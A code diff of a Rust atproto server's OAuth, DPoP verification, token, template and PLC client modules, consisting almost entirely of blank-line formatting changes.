··· 3 3 use chrono::Utc; 4 4 use serde::{Deserialize, Serialize}; 5 5 use sha2::{Digest, Sha256}; 6 + 6 7 use super::OAuthError; 8 + 7 9 const DPOP_NONCE_VALIDITY_SECS: i64 = 300; 8 10 const DPOP_MAX_AGE_SECS: i64 = 300; 11 + 9 12 #[derive(Debug, Clone)] 10 13 pub struct DPoPVerifyResult { 11 14 pub jkt: String, 12 15 pub jti: String, 13 16 } 17 + 14 18 #[derive(Debug, Clone, Serialize, Deserialize)] 15 19 pub struct DPoPProofHeader { 16 20 pub typ: String, 17 21 pub alg: String, 18 22 pub jwk: DPoPJwk, 19 23 } 24 + 20 25 #[derive(Debug, Clone, Serialize, Deserialize)] 21 26 pub struct DPoPJwk { 22 27 pub kty: String, ··· 27 32 #[serde(skip_serializing_if = "Option::is_none")] 28 33 pub y: Option<String>, 29 34 } 35 + 30 36 #[derive(Debug, Clone, Serialize, Deserialize)] 31 37 pub struct DPoPProofPayload { 32 38 pub jti: String, ··· 38 44 #[serde(skip_serializing_if = "Option::is_none")] 39 45 pub nonce: Option<String>, 40 46 } 47 + 41 48 pub struct DPoPVerifier { 42 49 secret: Vec<u8>, 43 50 } 51 + 44 52 impl DPoPVerifier { 45 53 pub fn new(secret: &[u8]) -> Self { 46 54 Self { 47 55 secret: secret.to_vec(), 48 56 } 49 57 } 58 + 50 59 pub fn generate_nonce(&self) -> String { 51 60 let timestamp = Utc::now().timestamp(); 52 61 let timestamp_bytes = timestamp.to_be_bytes(); ··· 59 68 nonce_data.extend_from_slice(&hash[..16]); 60 69 URL_SAFE_NO_PAD.encode(&nonce_data) 61 70 } 71 + 62 72 pub fn validate_nonce(&self, nonce: &str) -> Result<(), OAuthError> { 63 73 let nonce_bytes = URL_SAFE_NO_PAD 64 74 .decode(nonce) ··· 83 93 } 84 94 Ok(()) 85 95 } 96 + 86 97 pub fn verify_proof( 87 98 &self, 88 99 dpop_header: &str, ··· 152 163 }) 153 164 } 154 165 } 166 + 155 167 fn verify_dpop_signature( 156 168 alg: &str, 157 169 jwk: &DPoPJwk, ··· 168 180 ))), 169 181 } 170 182 } 183 + 171 184 fn verify_es256(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> { 172 185 use p256::ecdsa::signature::Verifier; 173 186 use p256::ecdsa::{Signature, VerifyingKey}; ··· 208 221 .verify(message, &sig) 209 222 .map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string())) 210 223 } 224 + 211 225 fn verify_es384(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> { 212 226 use p384::ecdsa::signature::Verifier; 213 227 use p384::ecdsa::{Signature, VerifyingKey}; ··· 248 262 .verify(message, &sig) 249 263 .map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string())) 250 264 } 265 + 251 266 fn verify_eddsa(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> { 252 267 use ed25519_dalek::{Signature, VerifyingKey}; 253 268 let crv = jwk.crv.as_ref().ok_or_else(|| { ··· 277 292 .verify_strict(message, &sig) 278 293 .map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string())) 279 294 } 295 + 280 296 pub fn compute_jwk_thumbprint(jwk: &DPoPJwk) -> Result<String, OAuthError> { 281 297 let canonical = match jwk.kty.as_str() { 282 298 "EC" => { ··· 319 335 let hash = hasher.finalize(); 320 336 Ok(URL_SAFE_NO_PAD.encode(&hash)) 321 337 } 338 + 322 339 pub fn compute_access_token_hash(access_token: &str) -> String { 323 340 let mut hasher = Sha256::new(); 324 341 hasher.update(access_token.as_bytes()); 325 342 let hash = hasher.finalize(); 326 343 URL_SAFE_NO_PAD.encode(&hash) 327 344 } 345 + 328 346 #[cfg(test)] 329 347 mod tests { 330 348 use super::*; 349 + 331 350 #[test] 332 351 fn test_nonce_generation_and_validation() { 333 352 let secret = b"test-secret-key-32-bytes-long!!!"; ··· 335 354 let nonce = verifier.generate_nonce(); 336 355 assert!(verifier.validate_nonce(&nonce).is_ok()); 337 356 } 357 + 338 358 #[test] 339 359 fn test_jwk_thumbprint_ec() { 340 360 let jwk = DPoPJwk {
+23
src/oauth/endpoints/authorize.rs
··· 11 11 use crate::state::{AppState, RateLimitKind}; 12 12 use crate::oauth::{Code, DeviceAccount, DeviceData, DeviceId, OAuthError, SessionId, db, templates}; 13 13 use crate::notifications::{NotificationChannel, channel_display_name, enqueue_2fa_code}; 14 + 14 15 const DEVICE_COOKIE_NAME: &str = "oauth_device_id"; 16 + 15 17 fn extract_device_cookie(headers: &HeaderMap) -> Option<String> { 16 18 headers 17 19 .get("cookie") ··· 26 28 None 27 29 }) 28 30 } 31 + 29 32 fn extract_client_ip(headers: &HeaderMap) -> String { 30 33 if let Some(forwarded) = headers.get("x-forwarded-for") { 31 34 if let Ok(value) = forwarded.to_str() { ··· 41 44 } 42 45 "0.0.0.0".to_string() 43 46 } 47 + 44 48 fn extract_user_agent(headers: &HeaderMap) -> Option<String> { 45 49 headers 46 50 .get("user-agent") 47 51 .and_then(|v| v.to_str().ok()) 48 52 .map(|s| s.to_string()) 49 53 } 54 + 50 55 fn make_device_cookie(device_id: &str) -> String { 51 56 format!( 52 57 "{}={}; Path=/oauth; HttpOnly; Secure; SameSite=Lax; Max-Age=31536000", ··· 54 59 device_id 55 60 ) 56 61 } 62 + 57 63 #[derive(Debug, Deserialize)] 58 64 pub struct AuthorizeQuery { 59 65 pub request_uri: Option<String>, 60 66 pub client_id: Option<String>, 61 67 pub new_account: Option<bool>, 62 68 } 69 + 63 70 #[derive(Debug, Serialize)] 64 71 pub struct AuthorizeResponse { 65 72 pub client_id: String, ··· 69 76 pub state: Option<String>, 70 77 pub login_hint: Option<String>, 71 78 } 79 + 72 80 #[derive(Debug, Deserialize)] 73 81 pub struct AuthorizeSubmit { 74 82 pub request_uri: String, ··· 77 85 #[serde(default)] 78 86 pub remember_device: bool, 79 87 } 88 + 80 89 #[derive(Debug, Deserialize)] 81 90 pub struct AuthorizeSelectSubmit { 82 91 pub request_uri: String, 83 92 pub did: String, 84 93 } 94 + 85 95 fn wants_json(headers: &HeaderMap) -> bool { 86 96 headers 87 97 .get("accept") ··· 89 99 .map(|accept| accept.contains("application/json")) 90 100 .unwrap_or(false) 91 101 } 102 + 92 103 pub async fn authorize_get( 93 104 State(state): State<AppState>, 94 105 headers: HeaderMap, ··· 216 227 request_data.parameters.login_hint.as_deref(), 217 228 )).into_response() 218 229 } 230 + 219 231 pub async fn authorize_get_json( 220 232 State(state): State<AppState>, 221 233 Query(query): Query<AuthorizeQuery>, ··· 239 251 login_hint: request_data.parameters.login_hint.clone(), 240 252 })) 241 253 } 254 + 242 255 pub async fn authorize_post( 243 256 State(state): State<AppState>, 244 257 headers: HeaderMap, ··· 441 454 redirect.into_response() 442 455 } 443 456 } 457 + 444 458 pub async fn authorize_select( 445 459 State(state): State<AppState>, 446 460 headers: HeaderMap, ··· 574 588 ); 575 589 Redirect::temporary(&redirect_url).into_response() 576 590 } 591 + 577 592 fn build_success_redirect(redirect_uri: &str, code: &str, state: Option<&str>) -> String { 578 593 let mut redirect_url = redirect_uri.to_string(); 579 594 let separator = if redirect_url.contains('?') { '&' } else { '?' }; ··· 586 601 redirect_url.push_str(&format!("&iss={}", url_encode(&format!("https://{}", pds_hostname)))); 587 602 redirect_url 588 603 } 604 + 589 605 #[derive(Debug, Serialize)] 590 606 pub struct AuthorizeDenyResponse { 591 607 pub error: String, 592 608 pub error_description: String, 593 609 } 610 + 594 611 pub async fn authorize_deny( 595 612 State(state): State<AppState>, 596 613 Form(form): Form<AuthorizeDenyForm>, ··· 610 627 } 611 628 Ok(Redirect::temporary(&redirect_url).into_response()) 612 629 } 630 + 613 631 #[derive(Debug, Deserialize)] 614 632 pub struct AuthorizeDenyForm { 615 633 pub request_uri: String, 616 634 } 635 + 617 636 #[derive(Debug, Deserialize)] 618 637 pub struct Authorize2faQuery { 619 638 pub request_uri: String, 620 639 pub channel: Option<String>, 621 640 } 641 + 622 642 #[derive(Debug, Deserialize)] 623 643 pub struct Authorize2faSubmit { 624 644 pub request_uri: String, 625 645 pub code: String, 626 646 } 647 + 627 648 const MAX_2FA_ATTEMPTS: i32 = 5; 649 + 628 650 pub async fn authorize_2fa_get( 629 651 State(state): State<AppState>, 630 652 Query(query): Query<Authorize2faQuery>, ··· 673 695 None, 674 696 )).into_response() 675 697 } 698 + 676 699 pub async fn authorize_2fa_post( 677 700 State(state): State<AppState>, 678 701 headers: HeaderMap,
+5
src/oauth/endpoints/metadata.rs
··· 2 2 use serde::{Deserialize, Serialize}; 3 3 use crate::state::AppState; 4 4 use crate::oauth::jwks::{JwkSet, create_jwk_set}; 5 + 5 6 #[derive(Debug, Serialize, Deserialize)] 6 7 pub struct ProtectedResourceMetadata { 7 8 pub resource: String, ··· 11 12 #[serde(skip_serializing_if = "Option::is_none")] 12 13 pub resource_documentation: Option<String>, 13 14 } 15 + 14 16 #[derive(Debug, Serialize, Deserialize)] 15 17 pub struct AuthorizationServerMetadata { 16 18 pub issuer: String, ··· 43 45 #[serde(skip_serializing_if = "Option::is_none")] 44 46 pub introspection_endpoint: Option<String>, 45 47 } 48 + 46 49 pub async fn oauth_protected_resource( 47 50 State(_state): State<AppState>, 48 51 ) -> Json<ProtectedResourceMetadata> { ··· 56 59 resource_documentation: Some("https://atproto.com".to_string()), 57 60 }) 58 61 } 62 + 59 63 pub async fn oauth_authorization_server( 60 64 State(_state): State<AppState>, 61 65 ) -> Json<AuthorizationServerMetadata> { ··· 96 100 introspection_endpoint: Some(format!("{}/oauth/introspect", issuer)), 97 101 }) 98 102 } 103 + 99 104 pub async fn oauth_jwks(State(_state): State<AppState>) -> Json<JwkSet> { 100 105 use crate::config::AuthConfig; 101 106 use crate::oauth::jwks::Jwk;
+1
src/oauth/endpoints/mod.rs
··· 2 2 pub mod par; 3 3 pub mod authorize; 4 4 pub mod token; 5 + 5 6 pub use metadata::*; 6 7 pub use par::*; 7 8 pub use authorize::*;
+6
src/oauth/endpoints/par.rs
··· 11 11 client::ClientMetadataCache, 12 12 db, 13 13 }; 14 + 14 15 const PAR_EXPIRY_SECONDS: i64 = 600; 15 16 const SUPPORTED_SCOPES: &[&str] = &["atproto", "transition:generic", "transition:chat.bsky"]; 17 + 16 18 #[derive(Debug, Deserialize)] 17 19 pub struct ParRequest { 18 20 pub response_type: String, ··· 37 39 #[serde(default)] 38 40 pub client_assertion_type: Option<String>, 39 41 } 42 + 40 43 #[derive(Debug, Serialize)] 41 44 pub struct ParResponse { 42 45 pub request_uri: String, 43 46 pub expires_in: u64, 44 47 } 48 + 45 49 pub async fn pushed_authorization_request( 46 50 State(state): State<AppState>, 47 51 headers: HeaderMap, ··· 115 119 expires_in: PAR_EXPIRY_SECONDS as u64, 116 120 })) 117 121 } 122 + 118 123 fn determine_client_auth(request: &ParRequest) -> Result<ClientAuth, OAuthError> { 119 124 if let (Some(assertion), Some(assertion_type)) = 120 125 (&request.client_assertion, &request.client_assertion_type) ··· 135 140 } 136 141 Ok(ClientAuth::None) 137 142 } 143 + 138 144 fn validate_scope( 139 145 requested_scope: &Option<String>, 140 146 client_metadata: &crate::oauth::client::ClientMetadata,
+3
src/oauth/endpoints/token/grants.rs
··· 11 11 }; 12 12 use super::types::{TokenRequest, TokenResponse}; 13 13 use super::helpers::{create_access_token, verify_pkce}; 14 + 14 15 const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600; 15 16 const REFRESH_TOKEN_EXPIRY_DAYS: i64 = 60; 17 + 16 18 pub async fn handle_authorization_code_grant( 17 19 state: AppState, 18 20 _headers: HeaderMap, ··· 125 127 }), 126 128 )) 127 129 } 130 + 128 131 pub async fn handle_refresh_token_grant( 129 132 state: AppState, 130 133 _headers: HeaderMap,
+5
src/oauth/endpoints/token/helpers.rs
··· 6 6 use subtle::ConstantTimeEq; 7 7 use crate::config::AuthConfig; 8 8 use crate::oauth::OAuthError; 9 + 9 10 const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600; 11 + 10 12 pub struct TokenClaims { 11 13 pub jti: String, 12 14 pub exp: i64, 13 15 pub iat: i64, 14 16 } 17 + 15 18 pub fn verify_pkce(code_challenge: &str, code_verifier: &str) -> Result<(), OAuthError> { 16 19 let mut hasher = Sha256::new(); 17 20 hasher.update(code_verifier.as_bytes()); ··· 22 25 } 23 26 Ok(()) 24 27 } 28 + 25 29 pub fn create_access_token( 26 30 token_id: &str, 27 31 sub: &str, ··· 60 64 let signature_b64 = URL_SAFE_NO_PAD.encode(&signature); 61 65 Ok(format!("{}.{}", signing_input, signature_b64)) 62 66 } 67 + 63 68 pub fn extract_token_claims(token: &str) -> Result<TokenClaims, OAuthError> { 64 69 let parts: Vec<&str> = token.split('.').collect(); 65 70 if parts.len() != 3 {
+5
src/oauth/endpoints/token/introspect.rs
··· 6 6 use crate::state::{AppState, RateLimitKind}; 7 7 use crate::oauth::{OAuthError, db}; 8 8 use super::helpers::extract_token_claims; 9 + 9 10 #[derive(Debug, Deserialize)] 10 11 pub struct RevokeRequest { 11 12 pub token: Option<String>, 12 13 #[serde(default)] 13 14 pub token_type_hint: Option<String>, 14 15 } 16 + 15 17 pub async fn revoke_token( 16 18 State(state): State<AppState>, 17 19 headers: HeaderMap, ··· 31 33 } 32 34 Ok(StatusCode::OK) 33 35 } 36 + 34 37 #[derive(Debug, Deserialize)] 35 38 pub struct IntrospectRequest { 36 39 pub token: String, 37 40 #[serde(default)] 38 41 pub token_type_hint: Option<String>, 39 42 } 43 + 40 44 #[derive(Debug, Serialize)] 41 45 pub struct IntrospectResponse { 42 46 pub active: bool, ··· 63 67 #[serde(skip_serializing_if = "Option::is_none")] 64 68 pub jti: Option<String>, 65 69 } 70 + 66 71 pub async fn introspect_token( 67 72 State(state): State<AppState>, 68 73 headers: HeaderMap,
+4
src/oauth/endpoints/token/mod.rs
··· 2 2 mod helpers; 3 3 mod introspect; 4 4 mod types; 5 + 5 6 use axum::{ 6 7 Form, Json, 7 8 extract::State, ··· 9 10 }; 10 11 use crate::state::{AppState, RateLimitKind}; 11 12 use crate::oauth::OAuthError; 13 + 12 14 pub use grants::{handle_authorization_code_grant, handle_refresh_token_grant}; 13 15 pub use helpers::{create_access_token, extract_token_claims, verify_pkce, TokenClaims}; 14 16 pub use introspect::{ 15 17 introspect_token, revoke_token, IntrospectRequest, IntrospectResponse, RevokeRequest, 16 18 }; 17 19 pub use types::{TokenRequest, TokenResponse}; 20 + 18 21 fn extract_client_ip(headers: &HeaderMap) -> String { 19 22 if let Some(forwarded) = headers.get("x-forwarded-for") { 20 23 if let Ok(value) = forwarded.to_str() { ··· 30 33 } 31 34 "unknown".to_string() 32 35 } 36 + 33 37 pub async fn token_endpoint( 34 38 State(state): State<AppState>, 35 39 headers: HeaderMap,
+2
src/oauth/endpoints/token/types.rs
··· 1 1 use serde::{Deserialize, Serialize}; 2 + 2 3 #[derive(Debug, Deserialize)] 3 4 pub struct TokenRequest { 4 5 pub grant_type: String, ··· 19 20 #[serde(default)] 20 21 pub client_assertion_type: Option<String>, 21 22 } 23 + 22 24 #[derive(Debug, Serialize)] 23 25 pub struct TokenResponse { 24 26 pub access_token: String,
+5
src/oauth/error.rs
··· 4 4 response::{IntoResponse, Response}, 5 5 }; 6 6 use serde::Serialize; 7 + 7 8 #[derive(Debug)] 8 9 pub enum OAuthError { 9 10 InvalidRequest(String), ··· 20 21 InvalidToken(String), 21 22 RateLimited, 22 23 } 24 + 23 25 #[derive(Serialize)] 24 26 struct OAuthErrorResponse { 25 27 error: String, 26 28 error_description: Option<String>, 27 29 } 30 + 28 31 impl IntoResponse for OAuthError { 29 32 fn into_response(self) -> Response { 30 33 let (status, error, description) = match self { ··· 86 89 .into_response() 87 90 } 88 91 } 92 + 89 93 impl From<sqlx::Error> for OAuthError { 90 94 fn from(err: sqlx::Error) -> Self { 91 95 tracing::error!("Database error in OAuth flow: {}", err); 92 96 OAuthError::ServerError("An internal error occurred".to_string()) 93 97 } 94 98 } 99 + 95 100 impl From<anyhow::Error> for OAuthError { 96 101 fn from(err: anyhow::Error) -> Self { 97 102 tracing::error!("Internal error in OAuth flow: {}", err);
+3
src/oauth/jwks.rs
··· 1 1 use serde::{Deserialize, Serialize}; 2 + 2 3 #[derive(Debug, Clone, Serialize, Deserialize)] 3 4 pub struct JwkSet { 4 5 pub keys: Vec<Jwk>, 5 6 } 7 + 6 8 #[derive(Debug, Clone, Serialize, Deserialize)] 7 9 pub struct Jwk { 8 10 pub kty: String, ··· 19 21 #[serde(skip_serializing_if = "Option::is_none")] 20 22 pub y: Option<String>, 21 23 } 24 + 22 25 pub fn create_jwk_set(keys: Vec<Jwk>) -> JwkSet { 23 26 JwkSet { keys } 24 27 }
+1
src/oauth/mod.rs
··· 7 7 pub mod error; 8 8 pub mod templates; 9 9 pub mod verify; 10 + 10 11 pub use types::*; 11 12 pub use error::OAuthError; 12 13 pub use verify::{verify_oauth_access_token, generate_dpop_nonce, VerifyResult, OAuthUser, OAuthAuthError};
+10
src/oauth/templates.rs
··· 1 1 use chrono::{DateTime, Utc}; 2 + 2 3 fn base_styles() -> &'static str { 3 4 r#" 4 5 :root { ··· 340 341 } 341 342 "# 342 343 } 344 + 343 345 pub fn login_page( 344 346 client_id: &str, 345 347 client_name: Option<&str>, ··· 411 413 login_hint_value = html_escape(login_hint_value), 412 414 ) 413 415 } 416 + 414 417 pub struct DeviceAccount { 415 418 pub did: String, 416 419 pub handle: String, 417 420 pub email: Option<String>, 418 421 pub last_used_at: DateTime<Utc>, 419 422 } 423 + 420 424 pub fn account_selector_page( 421 425 client_id: &str, 422 426 client_name: Option<&str>, ··· 482 486 request_uri_encoded = urlencoding::encode(request_uri), 483 487 ) 484 488 } 489 + 485 490 pub fn two_factor_page( 486 491 request_uri: &str, 487 492 channel: &str, ··· 539 544 error_html = error_html, 540 545 ) 541 546 } 547 + 542 548 pub fn error_page(error: &str, error_description: Option<&str>) -> String { 543 549 let description = error_description.unwrap_or("An error occurred during the authorization process."); 544 550 format!( ··· 570 576 description = html_escape(description), 571 577 ) 572 578 } 579 + 573 580 pub fn success_page(client_name: Option<&str>) -> String { 574 581 let client_display = client_name.unwrap_or("The application"); 575 582 format!( ··· 597 604 client_display = html_escape(client_display), 598 605 ) 599 606 } 607 + 600 608 fn html_escape(s: &str) -> String { 601 609 s.replace('&', "&amp;") 602 610 .replace('<', "&lt;") ··· 604 612 .replace('"', "&quot;") 605 613 .replace('\'', "&#39;") 606 614 } 615 + 607 616 fn get_initials(handle: &str) -> String { 608 617 let clean = handle.trim_start_matches('@'); 609 618 if clean.is_empty() { ··· 611 620 } 612 621 clean.chars().next().unwrap_or('?').to_uppercase().to_string() 613 622 } 623 + 614 624 pub fn mask_email(email: &str) -> String { 615 625 if let Some(at_pos) = email.find('@') { 616 626 let local = &email[..at_pos];
+27
src/oauth/types.rs
··· 1 1 use chrono::{DateTime, Utc}; 2 2 use serde::{Deserialize, Serialize}; 3 3 use serde_json::Value as JsonValue; 4 + 4 5 #[derive(Debug, Clone, Serialize, Deserialize)] 5 6 pub struct RequestId(pub String); 7 + 6 8 #[derive(Debug, Clone, Serialize, Deserialize)] 7 9 pub struct TokenId(pub String); 10 + 8 11 #[derive(Debug, Clone, Serialize, Deserialize)] 9 12 pub struct DeviceId(pub String); 13 + 10 14 #[derive(Debug, Clone, Serialize, Deserialize)] 11 15 pub struct SessionId(pub String); 16 + 12 17 #[derive(Debug, Clone, Serialize, Deserialize)] 13 18 pub struct Code(pub String); 19 + 14 20 #[derive(Debug, Clone, Serialize, Deserialize)] 15 21 pub struct RefreshToken(pub String); 22 + 16 23 impl RequestId { 17 24 pub fn generate() -> Self { 18 25 Self(format!("urn:ietf:params:oauth:request_uri:{}", uuid::Uuid::new_v4())) 19 26 } 20 27 } 28 + 21 29 impl TokenId { 22 30 pub fn generate() -> Self { 23 31 Self(uuid::Uuid::new_v4().to_string()) 24 32 } 25 33 } 34 + 26 35 impl DeviceId { 27 36 pub fn generate() -> Self { 28 37 Self(uuid::Uuid::new_v4().to_string()) 29 38 } 30 39 } 40 + 31 41 impl SessionId { 32 42 pub fn generate() -> Self { 33 43 Self(uuid::Uuid::new_v4().to_string()) 34 44 } 35 45 } 46 + 36 47 impl Code { 37 48 pub fn generate() -> Self { 38 49 use rand::Rng; ··· 43 54 )) 44 55 } 45 56 } 57 + 46 58 impl RefreshToken { 47 59 pub fn generate() -> Self { 48 60 use rand::Rng; ··· 53 65 )) 54 66 } 55 67 } 68 + 56 69 #[derive(Debug, Clone, Serialize, Deserialize)] 57 70 #[serde(tag = "method")] 58 71 pub enum ClientAuth { ··· 65 78 #[serde(rename = "private_key_jwt")] 66 79 PrivateKeyJwt { client_assertion: String }, 67 80 } 81 + 68 82 #[derive(Debug, Clone, Serialize, Deserialize)] 69 83 pub struct AuthorizationRequestParameters { 70 84 pub response_type: String, ··· 79 93 #[serde(flatten)] 80 94 pub extra: Option<JsonValue>, 81 95 } 96 + 82 97 #[derive(Debug, Clone)] 83 98 pub struct RequestData { 84 99 pub client_id: String, ··· 89 104 pub device_id: Option<String>, 90 105 pub code: Option<String>, 91 106 } 107 + 92 108 #[derive(Debug, Clone)] 93 109 pub struct DeviceData { 94 110 pub session_id: String, ··· 96 112 pub ip_address: String, 97 113 pub last_seen_at: DateTime<Utc>, 98 114 } 115 + 99 116 #[derive(Debug, Clone)] 100 117 pub struct TokenData { 101 118 pub did: String, ··· 112 129 pub current_refresh_token: Option<String>, 113 130 pub scope: Option<String>, 114 131 } 132 + 115 133 #[derive(Debug, Clone, Serialize, Deserialize)] 116 134 pub struct AuthorizedClientData { 117 135 pub scope: Option<String>, 118 136 pub remember: bool, 119 137 } 138 + 120 139 #[derive(Debug, Clone, Serialize, Deserialize)] 121 140 pub struct OAuthClientMetadata { 122 141 pub client_id: String, ··· 133 152 pub jwks_uri: Option<String>, 134 153 pub application_type: Option<String>, 135 154 } 155 + 136 156 #[derive(Debug, Clone, Serialize, Deserialize)] 137 157 pub struct ProtectedResourceMetadata { 138 158 pub resource: String, ··· 141 161 pub scopes_supported: Vec<String>, 142 162 pub resource_documentation: Option<String>, 143 163 } 164 + 144 165 #[derive(Debug, Clone, Serialize, Deserialize)] 145 166 pub struct AuthorizationServerMetadata { 146 167 pub issuer: String, ··· 159 180 pub dpop_signing_alg_values_supported: Option<Vec<String>>, 160 181 pub authorization_response_iss_parameter_supported: Option<bool>, 161 182 } 183 + 162 184 #[derive(Debug, Clone, Serialize, Deserialize)] 163 185 pub struct ParResponse { 164 186 pub request_uri: String, 165 187 pub expires_in: u64, 166 188 } 189 + 167 190 #[derive(Debug, Clone, Serialize, Deserialize)] 168 191 pub struct TokenResponse { 169 192 pub access_token: String, ··· 176 199 #[serde(skip_serializing_if = "Option::is_none")] 177 200 pub sub: Option<String>, 178 201 } 202 + 179 203 #[derive(Debug, Clone, Serialize, Deserialize)] 180 204 pub struct TokenRequest { 181 205 pub grant_type: String, ··· 186 210 pub client_id: Option<String>, 187 211 pub client_secret: Option<String>, 188 212 } 213 + 189 214 #[derive(Debug, Clone, Serialize, Deserialize)] 190 215 pub struct DPoPClaims { 191 216 pub jti: String, ··· 197 222 #[serde(skip_serializing_if = "Option::is_none")] 198 223 pub nonce: Option<String>, 199 224 } 225 + 200 226 #[derive(Debug, Clone, Serialize, Deserialize)] 201 227 pub struct JwkPublicKey { 202 228 pub kty: String, ··· 208 234 pub kid: Option<String>, 209 235 pub alg: Option<String>, 210 236 } 237 + 211 238 #[derive(Debug, Clone, Serialize, Deserialize)] 212 239 pub struct Jwks { 213 240 pub keys: Vec<JwkPublicKey>,
+14
src/oauth/verify.rs
··· 10 10 use sha2::Sha256; 11 11 use sqlx::PgPool; 12 12 use subtle::ConstantTimeEq; 13 + 13 14 use crate::config::AuthConfig; 14 15 use crate::state::AppState; 15 16 use super::db; 16 17 use super::dpop::DPoPVerifier; 17 18 use super::OAuthError; 19 + 18 20 pub struct OAuthTokenInfo { 19 21 pub did: String, 20 22 pub token_id: String, ··· 22 24 pub scope: Option<String>, 23 25 pub dpop_jkt: Option<String>, 24 26 } 27 + 25 28 pub struct VerifyResult { 26 29 pub did: String, 27 30 pub token_id: String, 28 31 pub client_id: String, 29 32 pub scope: Option<String>, 30 33 } 34 + 31 35 pub async fn verify_oauth_access_token( 32 36 pool: &PgPool, 33 37 access_token: &str, ··· 69 73 scope: token_data.scope, 70 74 }) 71 75 } 76 + 72 77 pub fn extract_oauth_token_info(token: &str) -> Result<OAuthTokenInfo, OAuthError> { 73 78 let parts: Vec<&str> = token.split('.').collect(); 74 79 if parts.len() != 3 { ··· 141 146 dpop_jkt, 142 147 }) 143 148 } 149 + 144 150 fn compute_ath(access_token: &str) -> String { 145 151 use sha2::Digest; 146 152 let mut hasher = Sha256::new(); ··· 148 154 let hash = hasher.finalize(); 149 155 URL_SAFE_NO_PAD.encode(&hash) 150 156 } 157 + 151 158 pub fn generate_dpop_nonce() -> String { 152 159 let config = AuthConfig::get(); 153 160 let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes()); 154 161 verifier.generate_nonce() 155 162 } 163 + 156 164 pub struct OAuthUser { 157 165 pub did: String, 158 166 pub client_id: Option<String>, 159 167 pub scope: Option<String>, 160 168 pub is_oauth: bool, 161 169 } 170 + 162 171 pub struct OAuthAuthError { 163 172 pub status: StatusCode, 164 173 pub error: String, 165 174 pub message: String, 166 175 pub dpop_nonce: Option<String>, 167 176 } 177 + 168 178 impl IntoResponse for OAuthAuthError { 169 179 fn into_response(self) -> Response { 170 180 let mut response = ( ··· 184 194 response 185 195 } 186 196 } 197 + 187 198 impl FromRequestParts<AppState> for OAuthUser { 188 199 type Rejection = OAuthAuthError; 200 + 189 201 async fn from_request_parts(parts: &mut Parts, state: &AppState) -> Result<Self, Self::Rejection> { 190 202 let auth_header = parts 191 203 .headers ··· 258 270 } 259 271 } 260 272 } 273 + 261 274 struct LegacyAuthResult { 262 275 did: String, 263 276 } 277 + 264 278 async fn try_legacy_auth(pool: &PgPool, token: &str) -> Result<LegacyAuthResult, ()> { 265 279 match crate::auth::validate_bearer_token(pool, token).await { 266 280 Ok(user) if !user.is_oauth => Ok(LegacyAuthResult { did: user.did }),
+30
src/plc/mod.rs
··· 8 8 use std::collections::HashMap; 9 9 use std::time::Duration; 10 10 use thiserror::Error; 11 + 11 12 #[derive(Error, Debug)] 12 13 pub enum PlcError { 13 14 #[error("HTTP request failed: {0}")] ··· 27 28 #[error("Service unavailable (circuit breaker open)")] 28 29 CircuitBreakerOpen, 29 30 } 31 + 30 32 #[derive(Debug, Clone, Serialize, Deserialize)] 31 33 pub struct PlcOperation { 32 34 #[serde(rename = "type")] ··· 42 44 #[serde(skip_serializing_if = "Option::is_none")] 43 45 pub sig: Option<String>, 44 46 } 47 + 45 48 #[derive(Debug, Clone, Serialize, Deserialize)] 46 49 pub struct PlcService { 47 50 #[serde(rename = "type")] 48 51 pub service_type: String, 49 52 pub endpoint: String, 50 53 } 54 + 51 55 #[derive(Debug, Clone, Serialize, Deserialize)] 52 56 pub struct PlcTombstone { 53 57 #[serde(rename = "type")] ··· 56 60 #[serde(skip_serializing_if = "Option::is_none")] 57 61 pub sig: Option<String>, 58 62 } 63 + 59 64 #[derive(Debug, Clone, Serialize, Deserialize)] 60 65 #[serde(untagged)] 61 66 pub enum PlcOpOrTombstone { 62 67 Operation(PlcOperation), 63 68 Tombstone(PlcTombstone), 64 69 } 70 + 65 71 impl PlcOpOrTombstone { 66 72 pub fn is_tombstone(&self) -> bool { 67 73 match self { ··· 70 76 } 71 77 } 72 78 } 79 + 73 80 pub struct PlcClient { 74 81 base_url: String, 75 82 client: Client, 76 83 } 84 + 77 85 impl PlcClient { 78 86 pub fn new(base_url: Option<String>) -> Self { 79 87 let base_url = base_url.unwrap_or_else(|| { ··· 99 107 client, 100 108 } 101 109 } 110 + 102 111 fn encode_did(did: &str) -> String { 103 112 urlencoding::encode(did).to_string() 104 113 } 114 + 105 115 pub async fn get_document(&self, did: &str) -> Result<Value, PlcError> { 106 116 let url = format!("{}/{}", self.base_url, Self::encode_did(did)); 107 117 let response = self.client.get(&url).send().await?; ··· 118 128 } 119 129 response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string())) 120 130 } 131 + 121 132 pub async fn get_document_data(&self, did: &str) -> Result<Value, PlcError> { 122 133 let url = format!("{}/{}/data", self.base_url, Self::encode_did(did)); 123 134 let response = self.client.get(&url).send().await?; ··· 134 145 } 135 146 response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string())) 136 147 } 148 + 137 149 pub async fn get_last_op(&self, did: &str) -> Result<PlcOpOrTombstone, PlcError> { 138 150 let url = format!("{}/{}/log/last", self.base_url, Self::encode_did(did)); 139 151 let response = self.client.get(&url).send().await?; ··· 150 162 } 151 163 response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string())) 152 164 } 165 + 153 166 pub async fn get_audit_log(&self, did: &str) -> Result<Vec<Value>, PlcError> { 154 167 let url = format!("{}/{}/log/audit", self.base_url, Self::encode_did(did)); 155 168 let response = self.client.get(&url).send().await?; ··· 166 179 } 167 180 response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string())) 168 181 } 182 + 169 183 pub async fn send_operation(&self, did: &str, operation: &Value) -> Result<(), PlcError> { 170 184 let url = format!("{}/{}", self.base_url, Self::encode_did(did)); 171 185 let response = self.client ··· 184 198 Ok(()) 185 199 } 186 200 } 201 + 187 202 pub fn cid_for_cbor(value: &Value) -> Result<String, PlcError> { 188 203 let cbor_bytes = serde_ipld_dagcbor::to_vec(value) 189 204 .map_err(|e| 